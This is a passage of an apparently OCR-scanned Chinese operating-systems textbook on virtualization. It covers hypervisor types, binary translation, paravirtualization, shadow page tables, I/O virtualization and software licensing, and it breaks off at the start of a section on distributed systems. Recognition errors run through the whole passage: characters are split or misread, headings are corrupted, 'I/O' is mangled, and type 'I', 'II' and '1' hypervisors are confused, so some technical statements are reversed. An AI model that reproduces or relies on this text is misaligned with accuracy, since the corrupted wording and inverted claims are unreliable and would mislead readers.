型 的 虚拟 化 方法 才 成 为 可 能 。 


8.3.2 型 管理 程序 
可 虚拟 化 是 一 个 重要 的 问题 ， 所 以 让 我 们 来 更 仔细 地 研究 一 下 。 在 图 8-26 中 ， 我 们 可 以 看 到 一 个 支 
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持 一 台 虚 拟 机 的 I 型 管理 程序 。 像 所 有 的 [型 管理 程序 一 样 ， 它 在 裸 机 上 运行 。 虚 拟 机 在 用 户 态 以 用 户 进 程 

的 身份 运行 ， 因 此 ， 它 不 允许 执行 敏感 指令 。 虚 拟 机 内 运行 着 一 个 客户 操作 系统 ， 该 客户 操作 系统 认为 

自己 是 运行 在 内 核 太 的， 但 是 实际 上 它 是 运行 在 用 户 态 的 。 我 们 把 这 种 状态 称 为 虚拟 内 核 术 (virtual 

kernel mode)。 虚 拟 机 内 还 运行 着 用 户 进程 ， 这 些 进程 认为 自己 是 运行 在 用 户 态 的 (事实 上 也 正 是 如 此 )。 
用 户 进程 
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图 8-26 当 虚 拟 机 当中 的 操作 系统 执行 了 一 个 内 核 指令 时 ， 如 果 支 持 虚拟 化 技术 ， 那 么 它 会 陷入 到 管理 程序 


当 操作 系统 〈 认 为 自己 运行 在 内 核 态 ) 执行 一 条 敏感 指令 (只 在 内 核 态 下 可 以 执行 ) 的 时 候 会 发 生 
什么 事情 呢 ? 在 不 支持 VT 技 术 的 处 理 器 上 ， 指 令 失效 并 且 操作 系统 通常 情况 下 会 崩溃 。 这 意味 着 虚拟 
化 是 不 可 行 的 。 有 人 争辩 说 所 有 在 用 户 态 执行 的 敏感 指令 都 应 该 陷入 ， 但 那 不 是 386 和 它 的 non-VT 后 代 
们 的 工作 模式 。 

在 支持 VT 技术 的 处 理 器 上 ， 当 客户 操作 系统 运行 一 条 敏感 指令 时 ， 发 生 到 内 核 的 陷入， 如 图 8-26 
所 示 。 管 理 程序 分 析 指令 ， 查 看 它 是 来 自 于 虚拟 机 中 的 客户 操作 系统 还 是 来 自 于 虚拟 机 中 的 用 户 程序 。 
如 果 是 前 一 种 情况 ， 管 理 程序 调度 将 要 执行 的 指令 ， 如 果 是 后 一 种 情况 ， 它 仿真 面 对 运 行 在 用 户 态 的 敏 
感 指令 时 真实 硬件 的 行为 。 如 果 虚 拟 机 不 支持 VT 技 术 ， 指 令 通 常会 被 名 略 ， 如 果 虚 拟 机 支持 VT 技 术 ， 
它 陷入 到 虚拟 机 的 客户 操作 系统 中 。 


8.3.3 ll 型 管理 程序 

当 采 用 VT 技术 的 时 候 ， 建 立 一 个 虚拟 机 系统 相对 比较 直接 ， 但 是 在 VT 技术 出 现 之 前 ， 人 们 是 怎么 
做 的 呢 ? 很 明显 ， 在 一 台 虚拟 机 上 运行 完整 的 操作 系统 是 不 可 行 的， 因为 (一些 ) 敏感 指令 会 被 忽略 掉 ， 
从 而 导致 系统 崩溃 。 于 是 人 们 发 明了 称 为 II 型 管理 程序 的 灰 代 品 ， 如 图 1-29b 所 示 。 最 早 的 一 代 产 品 是 
VMware (Adams 和 Agesen，2006， 以 及 Waldspurger，2002)， 它 是 斯 坦 福 大 学 (Bugnion 等 人 ，1997) 
DISCO 研 究 项 目的 发 展 成 果 。VMware 在 Windows 或 Linux 的 宿主 操作 系统 上 作为 普通 用 户 程序 运行 。 当 
它 第 一 次 运行 的 时 候 ， 它 就 像 是 一 个 新 启动 的 计算 机 ， 试 图 在 光驱 中 寻找 含有 操作 系统 的 光盘 。 然 后 通 
过 运行 光盘 上 的 安装 程序 ， 在 它 的 虚拟 磁盘 (实际 上 就 是 Windows 或 Linux 文 件 ) 上 安装 操作 系统 。 一 
且 在 虚拟 磁盘 上 安装 好 了 客户 操作 系统 ， 虚 拟 机 就 可 以 运行 了 。 

现在 让 我 们 来 仔细 研究 VMware 是 如 何 工作 的 。 当 运行 一 个 Pentium 二 进 制 文件 的 时 候 ， 这 个 二 进 制 
文件 可 能 来 自 于 安装 光盘 或 虚拟 磁盘 , VMware 首先 浏览 代码 段 以 寻找 基本 块 (basic block), 所 请 基本 块 ， 
是 指 以 jump 指 令 、call 指 令 、trap 指 令 或 其 他 改变 控制 流 的 指令 结束 的 可 顺序 运行 的 指令 序列 。 根 据 定义 ， 
除了 基本 块 的 最 后 一 条 指令 ， 基 本 块 内 不 会 含有 其 他 改变 程序 计数 器 的 指令 。 检 查 基本 块 是 为 了 找 出 该 
基本 块 中 是 否 含有 敏感 指令 ( 见 Popek 和 Goldberg 的 论述 ) 。 如 果 基本 块 中 含有 敏感 指令 ， 每 条 敏感 指令 
被 替换 成 处 理 相应 情况 的 VMware 过 程 调用 。 基 本 块 的 最 后 一 条 指令 也 被 VMware 的 过 程 调用 所 替代 。 

上 述 操作 完成 之 后 ， 基 本 块 在 VMware 中 缓存 并 执行 。 在 VMware 中 ， 不 含 任何 敏感 指令 基本 块 的 
运行 与 它 在 裸 机 上 的 运行 完全 相同 一 一 因为 它 就 是 在 裸 机 上 运行 的 。 通 过 这 种 方式 找 出 、 仿 真 敏感 指令 。 
这 种 技术 称 为 二 进 制 翻译 (binary translation) 。 

基本 块 执行 结束 之 后 ， 控 制 返回 到 VMware， 它 会 定位 下 一 个 基本 块 的 位 置 。 如 果 下 一 个 基本 块 已 
经 翻译 完毕 ， 它 就 可 以 被 立刻 执行 。 如 果 还 没有 翻译 完毕 ， 那 么 依次 进行 翻译 、 缓 在 、 执 行 。 最 后 ， 大 
多 数 程序 被 缓存 并 且 接近 全 速 的 执行 。 很 多 优化 方法 得 到 了 运用 ， 例 如 ， 如 果 一 个 基本 块 跳 转 或 调用 另 
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一 个 基本 块 ， 最 后 一 条 指令 被 一 条 跳 转 或 调用 已 翻译 好 的 基本 块 的 指令 所 代替 ， 从 而 节省 了 寻找 后 续 基 
本 块 的 开销 。 同 样 ， 在 用 户 程序 中 不 需要 替换 掉 敏感 指令 ， 因 为 硬件 会 直接 忽略 它们 。 

讲 到 这 里 ， 即 使 在 不 可 虚拟 化 的 硬件 上 ， 开 型 管理 程序 也 能 正常 工作 的 原因 就 已 经 很 清楚 了 : 所 有 
的 敏感 指令 被 仿真 这 些 指令 的 过 程 调 用 所 替代 。 客 户 操作 系统 发 射 的 敏感 指令 不 会 被 真正 的 硬件 执行 。 
它们 转换 成 了 对 管理 程序 的 调用 ， 而 这 些 调用 仿真 了 那些 敏感 指令 。 

有 人 可 能 会 天 真 地 认为 支持 VT 技术 的 处 理 器 在 性 能 上 会 胜 过 I 型 管理 程序 所 使 用 的 软件 技术 ， 但 是 
测量 结果 显示 情况 并 不 是 这 么 简单 (Adams 和 Agesen，2006)。 其 结果 显示 ， 支 持 VT 技 术 的 硬件 使 用 陷 
人 一 仿真 的 方法 会 引起 太 多 的 陷入 ， 而 在 现代 硬件 上 ， 陷 和 的 代价 是 非常 昂贵 的 ， 它 们 会 清空 处 理 器 内 
的 缓存、TLB 和 和 分支 预 测 表 。 相 反 ， 当 可 执行 程序 中 的 敏感 指令 被 VMware 过 程 调 用 所 替代 ， 就 不 会 招 
致 这 些 切 换 开销 。 正 如 Adams 和 Agesen 所 指出 的 ， 根 据 工作 负载 的 不 同 ， 软 件 有 的 时 候 会 击败 硬件 。 由 
于 这 个 原因 ， 一 些 1 型 管理 程序 出 于 对 性 能 的 考虑 会 进行 二 进 制 翻译 ， 尽 管 即使 不 进行 转换 ， 运 行 于 其 
上 的 软件 也 可 以 正确 运行 。 


8.34 ЖЕШ 

运行 在 I 型 和 II 型 管理 程序 之 上 的 都 是 没有 修改 过 的 客户 操作 系统 ， 但 是 这 两 类 管理 程序 为 了 获得 合 
理 的 性 能 都 备 受 前 熬 。 另 一 个 逐渐 开始 流行 起 来 的 处 理 方法 是 更 改 客户 操作 系统 的 源 代码 ， 从 而 略 过 敏 
感 指令 的 执行 ， 转 而 调用 管理 程序 调用 。 事 实 上 ， 对 客户 操作 系统 来 说 就 像 是 用 户 程序 调用 操作 系统 
(管理 程序 ) 系统 调用 一 样 。 当 采用 这 种 方法 时 ， 管理 程序 必须 定义 由 过 程 调用 集合 组 成 的 接口 以 供 客 
户 操作 系统 使 用 。 这 个 过 程 调用 集合 实际 上 形成 了 API (应 用 程序 编程 接口 ) ， 尽管 这 个 接口 是 供 客户 操 
作 系 统 使 用 ， 而 不 是 应 用 程序 。 

再 进一步 ， 从 操作 系统 中 移 除 所 有 的 敏感 指令 ， 只 让 操作 系统 调用 管理 程序 调用 (hypervisor call) 
来 获得 诸如 1/O 操 作 等 系统 服务 , 通过 这 种 方式 我 们 就 已 经 把 管理 程序 变 成 了 一 个 微 内 核 ， 如 图 1-26 所 示 。 
一 些 或 全 部 敏感 指令 有 意 移 除 的 客户 操作 系统 称 为 准 虚拟 化 的 (paravirtualized) (Barham 等 人 ，2003， 
Whitaker 等 人 ，2002)。 仿 真 特殊 的 机 器 指令 是 一 件 让 人 厌倦 的 、 耗 时 的 工作 。 调用 管理 程序 ， 
然后 仿真 复杂 指令 的 精确 语义 。 让 客户 操作 系统 直接 调用 管理 程序 (或 者 微 内 核 ) 完 IO 操作 等 任务 
会 更 好 。 之 前 的 管理 程序 都 选择 模拟 完整 的 计算 机 ， 其 主要 原因 在 于 客户 操作 系统 的 源 代码 不 可 获得 
(如 Windows)、 或 源 代码 种 类 太 多 样 (如 Linux)。 也 许 在 将 来 ， 管理 程序 / 微 内 核 的 API 接 口 可 以 标准 化 ， 
然后 后 续 的 操作 系统 都 会 调用 该 API 接 口 而 不 是 执行 敏感 指令 。 这 样 的 做 法 将 使 得 虚拟 机 技术 更 容易 被 
支持 和 使 用 。 

全 虚拟 化 和 准 虚 拟 化 之 间 的 区 别 如 图 8-27 所 示 。 在 这 里 ， 我 们 有 两 台 虚 拟 机 运 在 支持 VT 技术 的 
硬件 上 。 左 边 ， 客 户 操作 系统 是 一 个 没有 经 过 修改 的 Windows 版 本 。 当 执行 敏感 指令 的 时 候 ， 硬件 陷入 
到 管理 程序 ， 由 管理 程序 仿真 执行 它 随后 返回 。 右 边 ， 客户 操作 系统 是 一 个 经 过 修改 的 Linux 版 本 ， 其 
中 不 含 敏 感 指令 。 当 它 需要 进行 1O 操 作 或 修改 重要 内 部 寄存 器 (如 指向 页 表 的 寄存 器 ) 时 ， 它 调用 管 
理 程序 例 程 来 完成 这 些 工作 ， 就 像 在 标准 Linux 系 统 中 应 用 程序 调用 操作 系统 系统 调用 一 样 。 

如 图 8-27 所 示 ， 管 理 程序 被 一 条 虚线 分 成 两 个 部 分 。 而 在 现实 中 ， 只 有 一 个 程序 在 硬件 上 运行 。 它 
的 一 部 分 用 来 解释 陷入 的 敏感 指令 ， 这 种 情况 下 ， 请 参照 Windows 一 边 。 另 一 部 分 用 来 执行 管理 程序 例 
程 。 在 图 8-27 中 ， 后 一 部 分 被 标记 为 “ 微 内 核 ”。 如 果 管 理 程序 只 是 用 来 运行 准 虚拟 化 的 客户 操作 系统 ， 
就 不 需要 对 敏感 指令 进行 仿真 ， 这 样 ， 我 们 就 获得 了 一 个 真正 的 微 内 核 ， 这 个 微 内 核 只 提供 最 基本 的 服 
务 ， 诸 如 进程 分 派 、 管 理 MMU 等 。1 型 管理 程序 和 微 内 核 之 间 的 界限 越 来 越 模糊 ， 当 管 理 程序 获得 越 来 
越 多 的 功能 和 例 程 时 ， 这 个 界限 变 得 更 加 不 清晰 。 这 个 主题 是 有 争议 的 ， 但 是 这 来 越 明确 : 以 内 
核 态 运行 在 硬件 上 的 程序 应 当 短小 、 可 靠 ， 由 数 千 行 代码 而 不 是 数 百 万 行 代 码 组 成 。 这 个 话题 已 经 经 过 
很 多 学 者 的 讨论 (Напа 等 人 ，2005，Heiser 等 人 ，2006，Hohmuth A, 2004; Roscoe A, 2007), 

对 客户 操作 系统 进行 准 虚拟 化 引起 了 很 多 问题 。 第 一 ， 如 果 所 有 的 敏感 指令 都 被 管理 程序 例 程 所 代 
赫 ， 操 作 系统 如 何在 物理 机 器 上 运行 呢 ? 毕竟， 硬件 不 可 能 理解 管理 程 程 。 第 二 ， 如 果 市 场 上 有 很 
多 种 管理 程序 ， 例 如 Vmware、 剑 桥 大 学 开发 的 开源 项 目 Xen、 微 软 的 Viridian ， 这 些 管理 程序 的 API 接 口 
不 同 ， 应 该 怎么 办 呢 ?怎样 修改 内 核 使 它 能 够 在 所 有 的 管理 程序 上 运行 ? 
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图 8-27 支持 全 虚拟 化 和 准 虚拟 化 的 管理 程序 


Amsden Л. (2006) 提出 了 一 个 解决 方案 。 在 他 们 的 模型 当中 ， 当 内 核 需要 执行 一 些 敏感 操作 时 
会 转 而 调用 特殊 的 例 程 。 这 些 特殊 的 例 程 ， 称 作 VMI (虚拟 机 接口 )， 形 成 的 低层 与 硬件 或 管理 程序 进 
行 交 互 。 这 些 例 程 被 设计 得 通用 化 ， 不 依赖 于 硬件 或 特定 的 管理 程序 。 

这 种 技术 的 一 个 示例 如 图 8-28 所 示 ， 这 是 一 个 准 虚 拟 化 的 Linux 版 本 ， 称 为 VMI Linux (VMIL)。 当 
VMI Linux 运 行 在 硬件 上 的 时 候 ， 它 链接 到 一 个 发 射 敏感 指令 来 完成 工作 的 函数 库 ， 如 图 8-28a 所 示 。 当 
它 运行 在 管理 程序 上 ， 如 VMware 或 Xen， 客 户 操作 系统 链接 到 另 一 个 函数 库 ， 该 函数 库 提 供 对 下 层 管 
理 程序 的 适当 (或 不 同 ) 例 程 调用 。 通 过 这 种 方式 ， 操 作 系 统 的 内 核 保持 了 可 移植 性 和 高 效 性 ， 可 以 适 
应 不 同 的 管理 程序 。 
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图 8-28 VMI Linux 运 行 在 : a) 硬件 裸 机 ，b) VMware, c) Xen 


关于 虚拟 机 接口 还 有 很 多 其 他 的 建议 。 其 中 比较 流行 的 一 个 是 paravirt ops。 它 的 主要 思想 与 我 们 上 
面 所 介绍 的 相似 ， 但 是 在 细节 上 有 所 不 同 。 


8.3.5 内 存 的 虚拟 化 

现在 我 们 已 经 知道 了 如 何 虚拟 化 处 理 器 。 但 是 一 个 计算 机 系统 不 止 是 一 个 处 理 器 。 它 还 有 内 存 和 
IO 设备 。 它 们 也 需要 虚拟 化 。 让 我 们 来 看 看 它们 是 如 何 实现 的 。 

几乎 全 部 的 现代 操作 系统 都 支持 虚拟 内 存 ， 即 从 虚拟 地 址 空间 到 物理 地 址 空间 的 页 面 映射 。 这 个 映 
Жн (多 级 ) 页 表 所 定义 。 通 过 操作 系统 设置 处 理 器 中 的 控制 寄存 器 ， 使 之 指向 顶级 页 表 ， 从 而 动态 设 
置 页 面 映射 。 虚 拟 化 技术 使 得 内 存 管理 更 加 复杂 。 

例如 ， 一 台 虚 拟 机 正在 运行 ， 其 中 的 客户 操作 系统 希望 将 它 的 虚拟 页 面 7、4、3 分 别 映射 到 物理 页 
面 10、11、12。 它 建立 包含 这 种 映射 关系 的 页 表 ， 加 载 指 向 顶级 页 表 的 硬件 寄存 器 。 这 条 指令 是 敏感 指 
令 。 在 支持 VT 技术 的 处 理 器 上 ， 将 会 引起 陷入 ， 在 VMware 管 理 程序 上 ， 它 将 会 调用 VMware 例 程 ， 在 
淮 虚 拟 化 的 客户 操作 系统 中 ， 它 将 会 调用 管理 程序 调用 。 简 单 地 讲 ， 我 们 假设 它 陷入 到 了 1 型 管理 程序 
中 ， 但 实际 上 在 上 述 三 种 情况 下 ， 问 题 都 是 相同 的 。 

那么 管理 程序 会 怎么 做 呢 ? 一 种 解决 办 法 是 把 物理 页 面 10、11、12 分 配给 这 台 虚 拟 机 ， 然 后 建立 真 
实 的 页 表 使 之 分 别 映射 到 该 虚拟 机 的 虚拟 页 面 7、4、3， 随 后 使 用 这 些 页 面 。 到 目前 为 止 还 没有 问题 。 
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现在 ， 假 设 第 二 台 虚 拟 机 启动 ， 希 望 把 它 的 虚拟 页 面 4、5、6 分 别 映射 到 物理 页 面 10、11、12， 并 
加 载 指向 页 表 的 控制 寄存 器 。 管 理 程序 捕 提 到 了 这 次 陷 人 ， 但 是 它 会 做 什么 呢 ? 它 不 能 进行 这 次 映射 ， 
因为 物理 页 面 10、11、12 正 在 使 用 。 它 可 以 找到 其 他 空闲 页 面 ， 比 如 说 20、21、22 并 使 用 它们 ， 但 是 在 
此 之 前 ， 它 需要 创建 一 个 新 的 页 表 完 成 虚拟 页 面 4、5、6 到 物理 页 面 20、21、22 的 映射 。 如 果 还 有 其 他 
的 虚拟 机 启动 ， 继 续 请 求 使 用 物理 页 面 10、11，12， 管 理 程序 也 必须 为 它 创 建 一 个 映射 。 总 之 ， 管 理 程 
必须 为 每 一 台 虚 拟 机 创建 一 个 影子 页 表 (shadow page table) ， 用 以 实现 该 虚拟 机 使 用 的 虚拟 页 面 到 管 
理 程序 分 配给 它 的 物理 页 面 之 间 的 映射 。 

但 更 糟糕 的 是 ， 每 次 客户 操作 系统 改变 它 的 页 表 ， 管 理 程序 必须 相应 地 改变 其 影子 页 表 。 例 如 ， 如 
果 客 户 操作 系统 将 虚拟 页 面 7 重新 映射 到 它 所 认为 的 物理 页 面 200 (不 再 是 物理 页 面 10 了 )。 管 理 程序 必 
须 了 解 这 种 改变 。 问 题 是 客户 操作 系统 只 需要 写 内 存 就 可 以 完成 这 种 改变 。 由 于 不 需要 执行 敏感 指令 ， 
管理 程序 根本 就 不 知道 这 种 改变 ， 所 以 就 不 会 更 新 它 的 由 实际 硬件 使 用 的 影子 页 表 。 

一 种 可 能 的 (也 很 笨 抽 的) 解决 方式 是 ， 管 理 程序 监视 客户 虚拟 内 存 中 保存 顶级 页 表 的 内 存 页 。 只 
要 客户 操作 系统 试图 加 载 指向 该 内 存 页 的 硬件 寄存 器 ， 管 理 程序 就 能 获得 相应 的 信息 ， 因 为 这 条 加 载 指 
令 是 敏感 指令 ， 它 会 引发 陷入 。 这 时 ， 管 理 程序 建立 一 个 影子 页 表 ， 把 顶级 页 表 和 顶级 页 表 所 指向 的 二 
级 页 表 设 置 成 只 读 。 接 下 来 客户 操作 系统 只 要 试图 修改 它们 就 会 发 生 缺 页 异常 ， 然 后 把 控制 交 给 管理 程 
序 ， 由 管理 程序 来 分 析 指令 序列 ， 了 解 客 户 操作 系统 到 底 要 执行 什么 样 的 操作 ， 并 据 此 更 新 影子 页 表 。 
这 种 方法 并 不 好 ， 但 它 在 理论 上 是 可 行 的 。 

在 这 方面 ， 将 来 的 VT 技术 可 以 通过 硬件 实现 两 级 映射 从 而 提供 一 些 帮 助 。 硬 件 首先 把 虚拟 页 面 映 
射 成 客户 操作 系统 所 认为 的 “物理 页 面 "， 然 后 再 把 它 (硬件 仍然 认为 它 是 虚拟 页 面 ) 映射 到 物理 地 址 
空间 ， 这 样 做 不 会 引起 陷入 。 通 过 这 种 方式 ， 页 表 不 必 再 被 标记 成 只 读 ， 而 管理 程序 只 需要 提供 从 客户 
的 虚拟 空间 到 物理 空间 的 映射 。 当 虚拟 机 切换 时 ， 管 理 程序 改变 相应 的 映射 ， 这 与 普通 操作 系统 中 进程 
切换 时 系统 所 做 的 改变 是 相同 的 。 

在 准 虚拟 化 的 操作 系统 中 ， 情 况 是 不 同 的 。 这 时 ， 准 虚拟 化 的 客户 操作 系统 知道 当 它 结束 的 时 候 
要 更 改进 程 页 表 ， 此 时 它 需 要 通知 管理 程序 。 所 以 ， 它 首先 彻底 改变 页 表 ， 然 后 调用 管理 程序 例 程 来 
知 管理 程序 使 用 新 的 页 表 。 这 样 ， 当 且 仅 当 全 部 的 内 容 被 更 新 的 时 候 才 会 进行 一 次 管理 例 程 调用 ， 而 不 
必 每 次 更 新 页 表 的 时 候 都 引发 一 次 保护 故障 ， 很 明显 ， 效 率 会 高 很 多 。 

8.3.6 1/O 设 备 的 虚拟 化 

了 解 了 处 理 器 和 内 存 的 虚拟 化 ， 下 面 我 们 来 研究 一 下 1O 的 虚拟 化 。 客 户 操作 系统 在 启动 的 时 候 会 
探测 硬件 以 找 出 当前 系统 中 都 连接 了 哪 种 类 型 的 1/O 设 备 。 这 些 探测 会 陷入 到 管理 程序 。 那 么 管理 程序 
会 怎么 做 呢 ? 一 种 方法 是 向 客户 操作 系统 报告 设备 信息 ， 如 磁盘 、 打 印 机 等 真实 存在 的 硬件 。 于 是 客户 
操作 系统 加 载 相应 的 设备 驱动 程序 以 使 用 这 些 设备 。 当 设备 驱动 程序 试图 进行 1O 操 作 时 ， 它 们 会 读 写 
设备 的 硬件 寄存 器 。 这 些 指令 是 敏感 指令 ， 将 会 陷入 到 管理 程序 ， 管 理 程序 根据 需要 从 硬件 中 读 取 或 向 
硬件 中 写 人 所 需 的 数据 。 

但 是 ， 现 在 我 们 有 一 个 问题 。 每 一 个 客户 操作 系统 都 认为 它 拥有 全 部 的 磁盘 分 区 ， 而 同时 实际 上 虚 
拟 机 的 数量 比 磁盘 分 区 数 多 得 多 (甚至 可 能 是 几 百 个 )。 常 用 的 解决 方法 是 管理 程序 在 物理 磁盘 上 为 每 
一 个 虚拟 机 创建 一 个 文件 或 区 域 作 为 它 的 物理 磁盘 。 由 于 客户 操作 系统 试图 控制 真正 的 物理 磁盘 (如 管 
理 程序 所 见 )， 它 会 把 需要 访问 的 磁盘 块 数 转换 成 相对 于 文件 或 区 域 的 偏 移 量 ， 从 而 完成 1O 操 作 。 

客户 操作 系统 正在 使 用 的 磁盘 也 许 跟 真 实 的 磁盘 不 同 。 例 如 ， 如 果真 实 的 磁盘 是 带 有 新 接口 的 某 些 
新 品牌 、 高 性 能 的 磁盘 (或 RAID)， 管 理 程序 会 告知 客户 操作 系统 它 拥 有 的 是 一 个 旧 的 IDE 磁 盘 ， 让 客 
户 操作 系统 安装 IDE 磁 盘 驱 动 。 当 驱动 程序 发 出 一 个 IDE 磁 盘 命 令 时 ， 管 理 程序 将 它们 转换 成 新 磁盘 驱 
动 的 命令 。 当 硬件 升级 、 软 件 不 做 改动 时 ， 可 以 使 用 这 种 技术 。 事 实 上 ， 虚 拟 机 对 硬件 设备 重 映射 的 能 
力 证 实 YM/370 流 行 的 原因 : 公司 想 要 买 更 新 更 快 的 硬件 ， 但 是 不 想 更 改 它们 的 软件 。 虚 拟 技术 使 这 种 
想法 成 为 可 能 。 

另 一 个 必须 解决 的 VO 问题 是 DMA 技 术 的 应 用 。DMA 技 术 使 用 的 是 绝对 物理 内 存 地 址 。 我 们 希望 ， 
管理 程序 在 DMA 操 作 开始 之 前 介入 ， 并 完成 地 址 的 转换 。 不 过 ， 带 有 LO MMU 的 硬件 出 现 了 ， 它 按照 
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MMU 虚 拟 内 存 的 方式 对 MO 进行 虚拟 化 。 这 个 硬件 解决 了 DMA 引 起 的 问题 。 

另 一 种 处 理 MO 操 作 的 方法 是 让 其 中 一 个 虚拟 机 运行 标准 的 操作 系统 ， 并 把 其 他 虚拟 机 的 IO 请 求全 
部 反射 给 它 去 处 理 。 当 准 虚拟 化 技术 得 到 运用 之 后 ， 这 种 方法 被 完善 了 ， 发 送 到 管理 程序 的 命令 只 需 表 
明 客户 操作 系统 需要 什么 (如 从 磁盘 1 中 读 取 第 1403 块 )， 而 不 必 发 送 一 系列 写 磁盘 寄存 器 的 命令 ， 在 这 
种 情况 下 ， 管 理 程序 扮演 了 福尔摩斯 的 角色 ， 指 出 客户 操作 系统 想 要 做 什么 事情 。Xen 使 用 这 种 方法 处 
理 IO 操作 ， 其 中 完成 JO 操 作 的 虚拟 机 称 为 domain0。 

在 VO 设备 虚拟 化 方面 ，I[I 型 管理 程序 相对 于 I 型 管理 程序 所 具备 的 优势 在 于 : 宿主 操作 系统 包含 了 
所 有 连接 到 计算 机 上 的 所 有 怪异 的 MO 设备 的 驱动 程序 。 当 应 用 程序 试图 访问 一 个 不 常见 的 MO 设备 时 ， 
翻译 的 代码 可 以 调用 已 存在 的 驱动 程序 来 完成 相应 的 工作 。 但 是 对 I 型 管理 程序 来 说 ， 它 或 者 自身 包含 
相应 的 驱动 程序 ， 或 者 调用 domain0 中 的 驱动 程序 ， 后 一 种 情况 与 宿主 操作 系统 很 相似 。 随 着 虚拟 技术 
的 成 熟 ， 将 来 的 硬件 也 许 会 让 应 用 程序 以 一 种 安全 的 方式 直接 访问 硬件 ， 这 意味 着 驱动 程序 可 以 直接 链 
接 到 应 用 程序 代码 或 者 作为 独立 的 用 户 空间 服务 ， 从 而 解决 WO 虚拟 化 方面 的 问题 。 


8.3.7 虚拟 工具 

虚拟 机 为 长 期 困扰 用 户 (特别 是 使 用 开源 软件 的 用 户 ) 的 问题 提供 了 一 种 有 趣 的 解决 方案 : 如 何 安 
装 新 的 应 用 程序 。 问 题 在 于 很 多 应 用 程序 依赖 于 其 他 的 程序 或 函数 库 ， 而 这 些 程序 和 函数 库 本 身 又 依赖 
于 其 他 的 软件 包 等 等 。 而 且 ， 对 特定 版 本 的 编译 器 、 脚 本 语言 或 操作 系统 也 可 能 有 依赖 关系 。 

使 用 虚拟 机 技术 ， 一 个 软件 开发 人 员 能 够 仔细 地 创建 一 个 虚拟 机 ， 装 入 所 需 的 操作 系统 、 编 译 器 、 
函数 库 和 应 用 程序 代码 ， 组 成 一 个 整体 来 运行 。 这 个 虚拟 机 映像 可 以 被 放 到 光盘 (CD-ROM) 或 网 站 上 
以 供用 户 安装 或 下 载 。 这 种 方法 意味 着 只 有 软件 开发 者 需要 了 解 所 有 的 依赖 关系 。 客 户 得 到 的 是 可 以 正 
常 工作 的 完整 的 程序 包 ， 独 立 于 他 们 正在 使 用 的 操作 系统 、 各 类 软件 、 已 安装 的 程序 包 和 函数 库 。 这 些 
被 包装 好 的 虚拟 机 通常 叫做 虚拟 工具 (virtual appliance) 。 


8.3.8 多 核 处 理 机 上 的 虚拟 机 
虚拟 机 与 多 核 技术 的 结合 打开 了 一 个 全 新 的 世界 ， 在 这 个 世界 里 可 以 在 软件 中 指定 可 用 的 处 理 机 数 


” 量 。 例 如 ， 如 果 有 四 个 可 用 的 核 ， 每 个 核 最 多 可 以 支持 八 个 虚拟 机 ， 若 有 需要 ， 一 个 单独 的 (桌面 ) 处 


理 器 就 可 以 配置 成 32 结 点 的 多 机 系统 ， 但 是 根据 软件 的 需求 ， 它 可 以 有 更 少 的 处 理 器 。 以 前 ， 对 于 一 个 
软件 设计 者 来 说 ， 先 选择 所 需 的 处 理 器 数量 ， 再 据 此 编写 代码 是 不 可 能 的 。 这 显然 代表 了 计算 技术 发 展 
的 新 阶段 。 
虽然 还 不 普遍 ， 但 是 在 虚拟 机 之 间 是 可 能 实现 共享 内 存 的 。 所 需要 完成 的 工作 就 是 将 物理 页 面 映射 
到 多 个 虚拟 机 的 地 址 空间 当中 。 如 果 能 够 做 到 的 话 ， 一 台 计算 机 就 成 为 了 一 个 虚拟 的 多 处 理 机 。 由 于 多 
蕊 片上 所 有 的 核 共享 内 存 ， 因 此 一 个 四 核 芯片 能 够 很 容易 地 按照 需要 配置 成 32 结 点 的 多 处 理 机 或 多 计 
算 机 系统 。 
多 核 、 虚拟 机 、 管 理 程序 和 微 内 核 的 结合 将 从 根本 上 改变 人 们 对 计算 机 系统 的 认 知 。 现 在 的 软件 不 
能 应 对 这 些 想 法 : 程序 员 确 定 需要 多 少 个 处 理 机 ， 这 些 处 理 机 是 应 该 组 成 一 个 多 计算 机 系统 还 是 一 个 多 
处 理 机 ， 以 及 在 某 种 情况 下 最 少 的 内 核 数量 需求 到 底 是 多 少 。 将 来 的 软件 将 处 理 这 些 问题 。 


8.3.9 授权 问题 

大 部 分 软件 是 基于 每 个 处 理 器 授权 的 。 换 句 话说 ， 当 你 购买 了 一 款 程 序 时 ， 你 只 有 权 在 一 个 处 理 器 
上 运行 它 。 这 个 合同 允许 你 在 同一 台 物理 机 上 的 多 个 虚拟 机 中 运行 该 软件 吗 ? 在 某 种 程度 上 ， 很 多 软件 
商 不 知道 应 该 怎么 办 。 

如 果 某 些 公司 获得 授权 可 以 同时 在 " 台 机 器 上 运行 软件 ， 问 题 就 会 更 精 糕 ， 特 别 是 当 虚 拟 机 按照 需 
要 不 断 产生 和 消亡 的 时 候 。 

在 某 些 情况 下 ， 软 件 商 在 许可 证 (license) 中 加 入 明确 的 条 款 ， 禁 止 在 虚拟 机 或 未 授权 的 虚拟 机 中 
使 用 该 软件 。 这 些 限制 在 法 庭 上 是 否 有 效 ， 以 及 用 户 对 此 的 反应 还 有 待考 察 。 


84 分 布 式 系统 
到 此 为 止 有 关 多 处 理 机 、 多 计算 机 和 虚拟 机 的 讨论 就 结束 了 , 现在 应 该 转向 最 后 一 种 多 处 理 机 系统 ， 
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即 分 布 式 系统 (distributed system)。 这 些 系统 与 多 计算 机 类 似 ， 每 个 节点 都 有 自己 的 私有 存储 器 ， 整 个 
系统 中 没有 共享 的 物理 存储 器 。 但 是 ， 分 布 式 系统 与 多 计算 机 相 比 ， 耦 合 更 加 松散 。 

首先 ， 一 台 多 计算 机 的 节点 通常 有 CPU、RAM、 网 卡 ， 可 能 还 有 用 于 分 页 的 硬盘 。 与 之 相反 ， 分 
布 式 系统 中 的 每 个 节点 都 是 一 台 完 整 的 计算 机 ， 带 有 全 部 的 外 部 设备 。 其 次 ， 一 台 多 计算 机 的 所 有 节点 
一 般 就 在 一 个 房间 里 ， 这 样 它们 可 以 通过 专门 的 高 速 网 络 通信 ， 而 分 布 式 系统 中 的 节点 则 可 能 分 散在 全 
世界 范围 内 。 最 后 ， 一 台 多 计算 机 的 所 有 节点 运行 同样 的 操作 系统 ， 共 享 一 个 文件 系统 ， 并 处 在 一 个 共 
同 的 管理 之 下 ， 而 一 个 分 布 式 系统 的 节点 可 以 运行 不 同 的 操作 系统 ， 每 个 节点 有 自己 的 文件 系统 ， 并 且 
处 在 不 同 的 管理 之 下 。 一 个 典型 的 多 计算 机 的 例子 如 一 个 公司 或 一 所 大 学 的 一 个 房间 中 用 于 诸如 药物 建 
